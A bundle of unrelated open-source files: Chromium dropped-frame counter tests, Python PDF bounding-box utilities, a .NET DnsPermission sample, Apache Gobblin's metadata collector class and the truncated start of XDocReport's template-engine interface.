EXPECT_EQ(PercentDroppedFrameMedian(), 20); EXPECT_LE(PercentDroppedFrameVariance(), 1); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, IncompleteWindow) { // There are only 5 frames submitted, so Max, 95pct, median and variance // should report zero. SimulateFrameSequence({false, false, false, false, true}, 1); EXPECT_EQ(MaxPercentDroppedFrame(), 0.0); EXPECT_EQ(PercentDroppedFrame95Percentile(), 0); EXPECT_EQ(PercentDroppedFrameMedian(), 0); EXPECT_LE(PercentDroppedFrameVariance(), 1); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, MaxPercentDroppedChanges) { // First 60 frames have 20% dropped. SimulateFrameSequence({false, false, false, false, true}, 12); double expected_percent_dropped_frame1 = (12 / GetTotalFramesInWindow()) * 100; EXPECT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame1); EXPECT_FLOAT_EQ(PercentDroppedFrame95Percentile(), 20); // There is only one // element in the histogram and that is 20. EXPECT_EQ(PercentDroppedFrameMedian(), 20); EXPECT_LE(PercentDroppedFrameVariance(), 1); // 30 new frames are added that have 18 dropped frames. // and the 30 frame before that had 6 dropped frames. // So in total in the window has 24 frames dropped out of 60 frames. SimulateFrameSequence({false, false, true, true, true}, 6); double expected_percent_dropped_frame2 = (24 / GetTotalFramesInWindow()) * 100; EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame2); // 30 new frames are added that have 24 dropped frames. // and the 30 frame before that had 18 dropped frames. // So in total in the window has 42 frames dropped out of 60 frames. SimulateFrameSequence({false, true, true, true, true}, 6); double expected_percent_dropped_frame3 = (42 / GetTotalFramesInWindow()) * 100; EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame3); // Percent dropped frame of window increases gradually to 70%. // 1 value exist when we reach 60 frames and 1 value thereafter for each // frame added. So there 61 values in histogram. Last value is 70 (2 sampels) // and then 67 with 1 sample, which would be the 95th percentile. EXPECT_EQ(PercentDroppedFrame95Percentile(), 67); } TEST_F(DroppedFrameCounterTest, MaxPercentDroppedWithIdleFrames) { // First 20 frames have 4 frames dropped (20%). SimulateFrameSequence({false, false, false, false, true}, 4); // Then no frames are added for 20 intervals. AdvancetimeByIntervals(20); // Then 20 frames have 16 frames dropped (60%). SimulateFrameSequence({false, false, true, true, true}, 4); // So in total, there are 40 frames in the 1 second window with 16 dropped // frames (40% in total). double expected_percent_dropped_frame = (16 / GetTotalFramesInWindow()) * 100; EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), expected_percent_dropped_frame); } TEST_F(DroppedFrameCounterTest, NoCrashForIntervalLargerThanWindow) { SetInterval(base::Milliseconds(1000)); SimulateFrameSequence({false, false}, 1); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, Percentile95WithIdleFrames) { // Test scenario: // . 4s of 20% dropped frames. // . 96s of idle time. // The 96%ile dropped-frame metric should be 0. // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); const auto* histogram = GetSlidingWindowHistogram(); // First 4 seconds with 20% dropped frames. 
SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 4); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.95), 20u); // Then no frames are added for 97s. Note that this 1s more than 96 seconds, // because the last second remains in the sliding window. AdvancetimeByIntervals(kFps * 97); // A single frame to flush the pipeline. SimulateFrameSequence({false}, 1); EXPECT_EQ(histogram->total_count(), 100u * kFps); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.96), 0u); EXPECT_GT(histogram->GetPercentDroppedFramePercentile(0.97), 0u); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, Percentile95WithIdleFramesWhileHidden) { // The test scenario is the same as |Percentile95WithIdleFrames| test: // . 4s of 20% dropped frames. // . 96s of idle time. // However, the 96s of idle time happens *after* the page becomes invisible // (e.g. after a tab-switch). In this case, the idle time *should not* // contribute to the sliding window. // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); const auto* histogram = GetSlidingWindowHistogram(); // First 4 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 4); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.95), 20u); // Hide the page (thus resetting the pending frames), then idle for 96s before // producing a single frame. dropped_frame_counter_.ResetPendingFrames(GetNextFrameTime()); AdvancetimeByIntervals(kFps * 97); // A single frame to flush the pipeline. SimulateFrameSequence({false}, 1); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.95), 20u); } TEST_P(SmoothnessStrategyDroppedFrameCounterTest, Percentile95WithIdleFramesThenHide) { // The test scenario is the same as |Percentile95WithIdleFramesWhileHidden|: // . 4s of 20% dropped frames. // . 96s of idle time. // However, the 96s of idle time happens *before* the page becomes invisible // (e.g. after a tab-switch). In this case, the idle time *should* // contribute to the sliding window. // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); const auto* histogram = GetSlidingWindowHistogram(); // First 4 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 4); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.95), 20u); // Idle for 96s before hiding the page. AdvancetimeByIntervals(kFps * 97); dropped_frame_counter_.ResetPendingFrames(GetNextFrameTime()); AdvancetimeByIntervals(kFps * 97); // A single frame to flush the pipeline. SimulateFrameSequence({false}, 1); EXPECT_EQ(histogram->GetPercentDroppedFramePercentile(0.96), 0u); EXPECT_GT(histogram->GetPercentDroppedFramePercentile(0.97), 0u); } // Tests that when ResetPendingFrames updates the sliding window, that the max // PercentDroppedFrames is also updated accordingly. 
(https://crbug.com/1225307) TEST_P(SmoothnessStrategyDroppedFrameCounterTest, ResetPendingFramesUpdatesMaxPercentDroppedFrames) { // This tests a scenario where gaps in frame production lead to having // leftover frames in the sliding window for calculations of // ResetPendingFrames. // // Testing for when those frames are sufficient to change the current maximum // PercentDroppedFrames. // // This has been first seen in GpuCrash_InfoForDualHardwareGpus which forces // a GPU crash. Introducing long periods of idle while the Renderer waits for // a new GPU Process. (https://crbug.com/1164647) // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; SetInterval(kInterval); // One good frame SimulateFrameSequence({false}, 1); // Advance 1s so that when we process the first window, we go from having // enough frames in the interval, to no longer having enough. AdvancetimeByIntervals(kFps); // The first frame should fill up the sliding window. It isn't dropped, so // there should be 0 dropped frames. This will pop the first reported frame. // The second frame is dropped, however we are now tracking less frames than // the 1s window. So we won't use it in calculations yet. SimulateFrameSequence({false, true}, 1); EXPECT_EQ(dropped_frame_counter_.sliding_window_max_percent_dropped(), 0u); // Advance 1s so that we will attempt to update the window when resetting the // pending frames. The pending dropped frame above should be calculated here, // and the max percentile should be updated. AdvancetimeByIntervals(kFps); dropped_frame_counter_.ResetPendingFrames(GetNextFrameTime()); EXPECT_GT(dropped_frame_counter_.sliding_window_max_percent_dropped(), 0u); // There should be enough sliding windows reported with 0 dropped frames that // the 95th percentile stays at 0. EXPECT_EQ(PercentDroppedFrame95Percentile(), 0u); } TEST_F(DroppedFrameCounterTest, ResetPendingFramesAccountingForPendingFrames) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; SetInterval(kInterval); // First 2 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 2); // Have a pending frame which would hold the frames in queue. SimulatePendingFrame(1); // One second with 40% dropped frames. SimulateFrameSequence({false, false, false, true, true}, (kFps / 5)); // On the first 2 seconds are accounted for and pdf is 20%. EXPECT_EQ(MaxPercentDroppedFrame(), 20); dropped_frame_counter_.ResetPendingFrames(GetNextFrameTime()); // After resetting the pending frames, the pdf would be 40%. EXPECT_EQ(MaxPercentDroppedFrame(), 40); } TEST_F(DroppedFrameCounterTest, Reset) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; SetInterval(kInterval); // First 2 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 2); // Have a pending frame which would hold the frames in queue. SimulatePendingFrame(1); // Another 2 seconds with 40% dropped frames. 
SimulateFrameSequence({false, false, false, true, true}, (kFps / 5) * 2); EXPECT_EQ(MaxPercentDroppedFrame(), 20u); dropped_frame_counter_.Reset(); // Simulating gpu thread crash // After reset the max percent dropped frame would be 0 and frames in queue // behind the pending frame would not affect it. EXPECT_EQ(MaxPercentDroppedFrame(), 0u); } TEST_F(DroppedFrameCounterTest, ConsistentSmoothnessRatings) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert(kFps == 100, "kFps must be 100 because this test depends on it."); SetInterval(kInterval); // Add 5 seconds with 2% dropped frames. This should be in the first bucket. SimulateFrameSequence(MakeFrameSequence(1, 50), (kFps / 50) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({100, 0, 0, 0, 0, 0, 0})); // Add 5 seconds with 5% dropped frames. This should be in the second bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence(MakeFrameSequence(1, 20), (kFps / 20) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 100, 0, 0, 0, 0, 0})); // Add 5 seconds with 10% dropped frames. This should be in the third bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence(MakeFrameSequence(1, 10), (kFps / 10) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 100, 0, 0, 0, 0})); // Add 5 seconds with 20% dropped frames. This should be in the fourth bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 100, 0, 0, 0})); // Add 5 seconds with 40% dropped frames. This should be in the fifth bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({false, false, false, true, true}, (kFps / 5) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 100, 0, 0})); // Add 5 seconds with 60% dropped frames. This should be in the sixth bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({false, false, true, true, true}, (kFps / 5) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 0, 100, 0})); // Add 5 seconds with 80% dropped frames. This should be in the last bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({false, true, true, true, true}, (kFps / 5) * 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 0, 0, 100})); } TEST_F(DroppedFrameCounterTest, MovingSmoothnessRatings) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert(kFps == 100, "kFps must be 100 because this test depends on it."); SetInterval(kInterval); // Add a second with 40% dropped frames. Nothing should be added to the // histogram yet. SimulateFrameSequence({false, false, false, true, true}, kFps / 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 0, 0, 0})); // Add a second with 80% dropped frames. All very bad buckets should have some // entries. SimulateFrameSequence({false, true, true, true, true}, kFps / 5); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 0, 0, 22, 64, 14})); // Add a second with 10% dropped frames. Should be mostly very bad, with a few // bad and okay windows. 
SimulateFrameSequence(MakeFrameSequence(1, 10), kFps / 10); EXPECT_TRUE(CheckSmoothnessBuckets({0, 0, 1, 9, 29, 50, 11})); // Add a second with 5% dropped frames, and a second with no dropped frames. // The sliding window should shift from ok to very good over time. SimulateFrameSequence(MakeFrameSequence(1, 20), kFps / 20); SimulateFrameSequence({false}, kFps); EXPECT_TRUE(CheckSmoothnessBuckets({15, 12.5, 23, 4.5, 14.5, 25, 5.5})); // Clear the counter, then add a second with 100% dropped frames and a second // with 0% dropped frames. As the sliding window shifts each integer percent // (other than 100%) should be reported once, exactly matching the size of // each bucket. dropped_frame_counter_.Reset(); dropped_frame_counter_.OnFcpReceived(); SimulateFrameSequence({true}, kFps); SimulateFrameSequence({false}, kFps); EXPECT_TRUE(CheckSmoothnessBuckets({3, 3, 6, 13, 25, 25, 25})); } TEST_F(DroppedFrameCounterTest, FramesInFlightWhenFcpReceived) { // Start five frames in flight. std::vector<viz::BeginFrameArgs> pending_frames = SimulatePendingFrame(5); // Set that FCP was received after the third frame starts, but before it ends. base::TimeTicks time_fcp_sent = pending_frames[2].frame_time + pending_frames[2].interval / 2; dropped_frame_counter_.SetTimeFcpReceivedForTesting(time_fcp_sent); // End each of the frames as dropped. The first three should not count for // smoothness, only the last two. for (const auto& frame : pending_frames) { dropped_frame_counter_.OnEndFrame(frame, CreateStubFrameInfo(true)); } EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 2u); } TEST_F(DroppedFrameCounterTest, ForkedCompositorFrameReporter) { // Run different combinations of main and impl threads dropping, make sure // only one frame is counted as dropped each time. SimulateForkedFrame(false, false); EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 0u); SimulateForkedFrame(true, false); EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 1u); SimulateForkedFrame(false, true); EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 2u); SimulateForkedFrame(true, true); EXPECT_EQ(dropped_frame_counter_.total_smoothness_dropped(), 3u); } TEST_F(DroppedFrameCounterTest, WorstSmoothnessTiming) { // Set an interval that rounds up nicely with 1 second. constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); // Prepare a second of pending frames, and send FCP after the last of these // frames. dropped_frame_counter_.Reset(); std::vector<viz::BeginFrameArgs> pending_frames = SimulatePendingFrame(kFps); const auto& last_frame = pending_frames.back(); base::TimeTicks time_fcp_sent = last_frame.frame_time + last_frame.interval / 2; dropped_frame_counter_.OnFcpReceived(); dropped_frame_counter_.SetTimeFcpReceivedForTesting(time_fcp_sent); // End each of the pending frames as dropped. These shouldn't affect any of // the metrics. for (const auto& frame : pending_frames) { dropped_frame_counter_.OnEndFrame(frame, CreateStubFrameInfo(true)); } // After FCP time, add a second each of 80% and 60%, and three seconds of 40% // dropped frames. This should be five seconds total. 
SimulateFrameSequence({false, true, true, true, true}, kFps / 5); SimulateFrameSequence({false, false, true, true, true}, kFps / 5); SimulateFrameSequence({false, false, false, true, true}, (kFps / 5) * 3); // Next two seconds are 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 2); // The first 1, 2, and 5 seconds shouldn't be recorded in the corresponding // max dropped after N seconds metrics. EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), 80); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter1Sec(), 60); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter2Sec(), 40); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter5Sec(), 20); // Next second is 100% dropped frames, all metrics should include this. SimulateFrameSequence({true}, kFps); EXPECT_FLOAT_EQ(MaxPercentDroppedFrame(), 100); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter1Sec(), 100); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter2Sec(), 100); EXPECT_FLOAT_EQ(MaxPercentDroppedFrameAfter5Sec(), 100); } #if BUILDFLAG(IS_CHROMEOS_ASH) TEST_F(DroppedFrameCounterTest, ReportForUI) { constexpr auto kInterval = base::Milliseconds(10); constexpr size_t kFps = base::Seconds(1) / kInterval; static_assert( kFps % 5 == 0, "kFps must be a multiple of 5 because this test depends on it."); SetInterval(kInterval); dropped_frame_counter_.EnableReporForUI(); base::HistogramTester histogram_tester; // 4 seconds with 20% dropped frames. SimulateFrameSequence({false, false, false, false, true}, (kFps / 5) * 4); // Exact 1 sample of changing to 20% dropped frame percentage. histogram_tester.ExpectUniqueSample( "Ash.Smoothness.MaxPercentDroppedFrames_1sWindow", 20, 1); // More than 1 samples of 20% dropped frame percentage. EXPECT_GE(histogram_tester.GetBucketCount( "Ash.Smoothness.MaxPercentDroppedFrames_1sWindow.Uniform", 20), 1); } #endif // BUILDFLAG(IS_CHROMEOS_ASH) } // namespace } // namespace cc
""" Created on Oct 21, 2015 @author: xiao """ from collections import namedtuple import numpy as np # bbox indices x0 = 0 y0 = 1 x1 = 2 y1 = 3 class Segment(namedtuple("Segment", ["e", "vector"])): __slots__ = () @property def length(self): return self.vector[x0] if self.vector[x0] else self.vector[y0] def horizontal(self): return bool(self.vector[x0]) def vertical(self): return bool(self.vector[y0]) def __str__(self, *args, **kwargs): return " ".join(str(x) for x in [self.e, self.vector, self.e.linewidth]) def vectorize(e, tolerance=0.1): """ vectorizes the pdf object's bounding box min_width is the width under which we consider it a line instead of a big rectangle """ tolerance = max(tolerance, e.linewidth) is_high = e.height > tolerance is_wide = e.width > tolerance # if skewed towards a line if is_wide and not is_high: return (e.width, 0.0) if is_high and not is_wide: return (0.0, e.height) def aligned(e1, e2): """ alignment is determined by two boxes having one exactly the same attribute, which could mean parallel, perpendicularly forming a corner etc. """ return ( any(close(c1, c2) for c1, c2 in zip(e1.bbox, e2.bbox)) or x_center_aligned(e1, e2) or y_center_aligned(e1, e2) ) def x_center_aligned(e1, e2): return close(e1.x0 + e1.x1, e2.x0 + e2.x1) def x_aligned(a, b): return x_center_aligned(a, b) or close(a.x0, b.x0) or close(a.x1, b.x1) def y_center_aligned(e1, e2): return close(e1.y0 + e1.y1, e2.y0 + e2.y1) def close(f1, f2, thres=2.0): return abs(f1 - f2) < thres def origin(bbox): return bbox[:2] def center(bbox): return ((bbox[x0] + bbox[x1]) / 2, (bbox[y0] + bbox[y1]) / 2) def area(bbox): return (bbox[x1] - bbox[x0]) * (bbox[y1] - bbox[y0]) def l1(c1, c2): return sum(abs(v1 - v2) for v1, v2 in zip(c1, c2)) def segment_diff(s1, s2): """ Returns the sum of absolute difference between two segments' end points. 
Only perfectly aligned segments return 0 """ return abs(s1[0] - s2[0]) + abs(s1[1] - s2[1]) def bound_bboxes(bboxes): """ Finds the minimal bbox that contains all given bboxes """ group_x0 = min(map(lambda l: l[x0], bboxes)) group_y0 = min(map(lambda l: l[y0], bboxes)) group_x1 = max(map(lambda l: l[x1], bboxes)) group_y1 = max(map(lambda l: l[y1], bboxes)) return (group_x0, group_y0, group_x1, group_y1) def bound_elems(elems): """ Finds the minimal bbox that contains all given elems """ group_x0 = min(map(lambda l: l.x0, elems)) group_y0 = min(map(lambda l: l.y0, elems)) group_x1 = max(map(lambda l: l.x1, elems)) group_y1 = max(map(lambda l: l.y1, elems)) return (group_x0, group_y0, group_x1, group_y1) def intersect(a, b): """ Check if two rectangles intersect """ if a[x0] == a[x1] or a[y0] == a[y1]: return False if b[x0] == b[x1] or b[y0] == b[y1]: return False return a[x0] <= b[x1] and b[x0] <= a[x1] and a[y0] <= b[y1] and b[y0] <= a[y1] def inside(outer, inner): return ( inner[x0] >= outer[x0] and inner[x1] <= outer[x1] and inner[y0] >= outer[y0] and inner[y0] <= outer[y1] ) _stretch_dir = np.array([-1, -1, 1, 1]) def enlarge(bbox, delta): return np.array(bbox) + delta * _stretch_dir def reading_order(e1, e2): """ A comparator to sort bboxes from top to bottom, left to right """ b1 = e1.bbox b2 = e2.bbox if round(b1[y0]) == round(b2[y0]) or round(b1[y1]) == round(b2[y1]): return float_cmp(b1[x0], b2[x0]) return float_cmp(b1[y0], b2[y0]) def xy_reading_order(e1, e2): """ A comparator to sort bboxes from left to right, top to bottom """ b1 = e1.bbox b2 = e2.bbox if round(b1[x0]) == round(b2[x0]): return float_cmp(b1[y0], b2[y0]) return float_cmp(b1[x0], b2[x0]) def column_order(b1, b2): """ A comparator that sorts bboxes first by "columns", where a column is made up of all bboxes that overlap, then by vertical position in each column. b1 = [b1.type, b1.top, b1.left, b1.bottom, b1.right] b2 = [b2.type, b2.top, b2.left, b2.bottom, b2.right] """ (top, left, bottom) = (1, 2, 3) # TODO(senwu): Reimplement the functionality of this comparator to # detect the number of columns, and sort those in reading order. # TODO: This is just a simple top to bottom, left to right comparator # for now. if round(b1[top]) == round(b2[top]) or round(b1[bottom]) == round(b2[bottom]): return float_cmp(b1[left], b2[left]) return float_cmp(b1[top], b2[top]) # if((b1[left] >= b2[left] and b1[left] <= b2[right]) or # (b2[left] >= b1[left] and b2[left] <= b1[right])): # return float_cmp(b1[top], b2[top]) # # # Return leftmost columns first # return float_cmp(b1[left], b2[left]) def float_cmp(f1, f2): if f1 > f2: return 1 elif f1 < f2: return -1 else: return 0 def merge_intervals(elems, overlap_thres=2.0): """ Project in x axis Sort by start Go through segments and keep max x1 Return a list of non-overlapping intervals """ overlap_thres = max(0.0, overlap_thres) ordered = sorted(elems, key=lambda e: e.x0) intervals = [] cur = [-overlap_thres, -overlap_thres] for e in ordered: if e.x0 - cur[1] > overlap_thres: # Check interval validity if cur[1] > 0.0: intervals.append(cur) cur = [e.x0, e.x1] continue cur[1] = max(cur[1], e.x1) intervals.append(cur) # Freeze the interval to tuples return map(tuple, intervals)
<filename>samples/snippets/cpp/VS_Snippets_Remoting/DnsPermission_Constructor/CPP/dnspermission_constructor.cpp /* This program demonstrates the 'Constructor' of 'DnsPermission' class. It creates an instance of 'DnsPermission' class and checks for permission.Then it creates a 'SecurityElement' Object* and prints it's attributes which hold the XML encoding of 'DnsPermission' instance . */ #using <System.dll> using namespace System; using namespace System::Net; using namespace System::Security; using namespace System::Security::Permissions; using namespace System::Collections; public ref class DnsPermissionExample { // <Snippet1> public: void useDns() { // Create a DnsPermission instance. DnsPermission^ permission = gcnew DnsPermission( PermissionState::Unrestricted ); // Check for permission. permission->Demand(); // Create a SecurityElement Object* to hold XML encoding of the DnsPermission instance. SecurityElement^ securityElementObj = permission->ToXml(); Console::WriteLine( "Tag, Attributes and Values of 'DnsPermission' instance :" ); Console::WriteLine( "\n\tTag : {0}", securityElementObj->Tag ); // Print the attributes and values. PrintKeysAndValues( securityElementObj->Attributes ); } private: void PrintKeysAndValues( Hashtable^ myList ) { // Get the enumerator that can iterate through the hash table. IDictionaryEnumerator^ myEnumerator = myList->GetEnumerator(); Console::WriteLine( "\n\t-KEY-\t-VALUE-" ); while ( myEnumerator->MoveNext() ) { Console::WriteLine( "\t {0}:\t {1}", myEnumerator->Key, myEnumerator->Value ); } Console::WriteLine(); } // </Snippet1> }; int main() { try { DnsPermissionExample^ dnsPermissionExampleObj = gcnew DnsPermissionExample; dnsPermissionExampleObj->useDns(); } catch ( SecurityException^ e ) { Console::WriteLine( "SecurityException caught!!!" ); Console::WriteLine( "Source : {0}", e->Source ); Console::WriteLine( "Message : {0}", e->Message ); } catch ( Exception^ e ) { Console::WriteLine( "Exception caught!!!" ); Console::WriteLine( "Source : {0}", e->Source ); Console::WriteLine( "Message : {0}", e->Message ); } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.gobblin.metadata; import java.util.Collections; import java.util.Iterator; import java.util.LinkedHashSet; import java.util.Set; import com.google.common.base.Preconditions; import org.apache.gobblin.metadata.types.GlobalMetadata; /** * This class collects metadata records, optionally merging them with a set of default metadata. It also * keeps track of all of the merged records so they can be published at a later date. */ public class GlobalMetadataCollector { public static final int UNLIMITED_SIZE = -1; private final LinkedHashSet<GlobalMetadata> metadataRecords; private final GlobalMetadata defaultMetadata; private final int cacheSize; private String lastSeenMetadataId; /** * Initialize a MetdataCollector with the given cache size. * @param cacheSize You can pass the value -1 to have an unlimited cache size. */ public GlobalMetadataCollector(int cacheSize) { this(null, cacheSize); } /** * Initialize a MetadataCollector with some default metadata to merge incoming records with. * (Eg: a dataset-URN or a set of Transfer-Encodings). */ public GlobalMetadataCollector(GlobalMetadata defaultMetadata, int cacheSize) { Preconditions.checkArgument(cacheSize == -1 || cacheSize > 0, "cacheSize must be -1 or greater than 0"); this.defaultMetadata = defaultMetadata; this.cacheSize = cacheSize; this.lastSeenMetadataId = ""; this.metadataRecords = new LinkedHashSet<>(); } /** * Process a metadata record, merging it with default metadata. * <p> * If the combined (metadata + defaultMetadata) record is not present in the Collector's cache, * then the new metadata record will be stored in cache and returned. The oldest record in the cache will be evicted * if necessary. * <p>> * If the new record already exists in the cache, then the LRU time will be updated but this method will return null. */ public synchronized GlobalMetadata processMetadata(GlobalMetadata metadata) { GlobalMetadata recordToAdd = getRecordToAdd(metadata); if (recordToAdd != null) { boolean isNew = addRecordAndEvictIfNecessary(recordToAdd); return isNew ? recordToAdd : null; } return null; } /** * Return a Set of all merged metadata records in the cache. The set is immutable. 
*/ public Set<GlobalMetadata> getMetadataRecords() { return Collections.unmodifiableSet(metadataRecords); } private boolean addRecordAndEvictIfNecessary(GlobalMetadata recordToAdd) { // First remove the element from the HashSet if it's already in there to reset // the 'LRU' piece; then add it back in boolean isNew = !metadataRecords.remove(recordToAdd); metadataRecords.add(recordToAdd); // Now remove the first element (which should be the oldest) from the list // if we've exceeded the cache size if (cacheSize != -1 && metadataRecords.size() > cacheSize) { Iterator<GlobalMetadata> recordIt = metadataRecords.iterator(); recordIt.next(); // Remove the oldest element - don't care what it is recordIt.remove(); } return isNew; } private GlobalMetadata getRecordToAdd(GlobalMetadata metadata) { if (metadata == null) { return defaultMetadata; } // Optimization - we know this record already has been seen, so don't // merge with defaults if (metadata.getId().equals(lastSeenMetadataId)) { return null; } lastSeenMetadataId = metadata.getId(); if (defaultMetadata != null) { metadata.mergeWithDefaults(defaultMetadata); } return metadata; } }
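The collector above is easiest to follow with a short usage sketch. The snippet below is not part of the Gobblin sources; it only exercises the constructor, processMetadata(), and getMetadataRecords() shown above, and it assumes the GlobalMetadata instances ("defaults" and "incoming") are built elsewhere.

import java.util.Set;

import org.apache.gobblin.metadata.GlobalMetadataCollector;
import org.apache.gobblin.metadata.types.GlobalMetadata;

public class GlobalMetadataCollectorSketch {

  public static void collectAndPublish(GlobalMetadata defaults, Iterable<GlobalMetadata> incoming) {
    // Keep at most 16 distinct merged records; GlobalMetadataCollector.UNLIMITED_SIZE (-1)
    // would disable eviction entirely.
    GlobalMetadataCollector collector = new GlobalMetadataCollector(defaults, 16);

    for (GlobalMetadata record : incoming) {
      // processMetadata() returns the merged record only the first time it is seen;
      // a repeat refreshes its LRU position and returns null.
      GlobalMetadata merged = collector.processMetadata(record);
      if (merged != null) {
        System.out.println("New merged metadata record: " + merged.getId());
      }
    }

    // Immutable view of everything still cached, oldest first; this is what a
    // publisher would emit at the end of the run.
    Set<GlobalMetadata> toPublish = collector.getMetadataRecords();
    System.out.println("Records to publish: " + toPublish.size());
  }
}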
/** * Copyright (C) 2011-2015 The XDocReport Team <<EMAIL>> * * All rights reserved. * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package fr.opensagres.xdocreport.template; import java.io.IOException; import java.io.Reader; import java.io.Writer; import java.util.Map; import fr.opensagres.xdocreport.core.XDocReportException; import fr.opensagres.xdocreport.core.io.IEntryReaderProvider; import fr.opensagres.xdocreport.core.io.IEntryWriterProvider; import fr.opensagres.xdocreport.template.cache.ITemplateCacheInfoProvider; import fr.opensagres.xdocreport.template.config.ITemplateEngineConfiguration; import fr.opensagres.xdocreport.template.formatter.IDocumentFormatter; /** * Template engine used to merge Java model with some entries (XML file) from an XML document archive. */ public interface ITemplateEngine { /** * Returns the template engien kind (Freemarker, Velocity..) * * @return */ String getKind(); void setTemplateCacheInfoProvider( ITemplateCacheInfoProvider templateCacheInfoProvider ); ITemplateCacheInfoProvider getTemplateCacheInfoProvider(); void setConfiguration( 